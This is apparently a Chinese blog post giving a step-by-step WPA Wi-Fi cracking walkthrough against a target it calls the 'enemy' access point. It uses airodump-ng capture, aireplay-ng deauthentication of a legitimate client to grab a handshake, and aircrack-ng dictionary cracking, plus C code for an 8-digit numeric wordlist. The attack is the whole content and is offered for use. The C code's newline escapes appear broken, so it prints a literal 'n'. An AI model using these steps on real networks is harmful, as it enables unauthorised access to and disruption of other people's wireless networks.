wpa 破解

发表评论

00:23:69:xx:xx:xx -85 6 54 WPA TKIP PSK HCP

00:0A:EB:xx:xx:xx 本地MAC
00:23:69:xx:xx:xx 敌人MAC
00:14:A5:xx:xx:DD 敌人AP中的一个合法客户的MAC

airodump-ng -c 6 –bssid 00:23:69:xx:xx:xx -w HCP mon0

aireplay-ng -0 10 -a 00:23:69:xx:xx:xx mon0
或者输入:aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0
aireplay-ng -0 10 -a 00:23:69:xx:xx:xx -c 00:14:A5:xx:xx:DD mon0
要取得一个撑手包就可以了

字典破解
aircrack-ng -w password.txt HCP*.cap
另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap

linux下字典的生成 p.c

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
int i=1;
//printf("%dn",sizeof(long int));
printf("00000000n");
while(i<=9){printf("0000000%dn",i);i++;}
while(i<=99){printf("000000%dn",i);i++;}
while(i<=999){printf("00000%dn",i);i++;}
while(i<=9999){printf("0000%dn",i);i++;}
while(i<=99999){printf("000%dn",i);i++;}
while(i<=999999){printf("00%dn",i);i++;}
while(i<=9999999){printf("0%dn",i);i++;}
while(i<=99999999){printf("%dn",i);i++;}

return 0;
}

gcc p.c -o p
./p > 8bit

这是生成的8位纯数字字典,生成后大小为853M

如果不能白,请参考
http://www.kumouse.com/article.asp?id=144
http://www.kumouse.com/article.asp?id=156

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注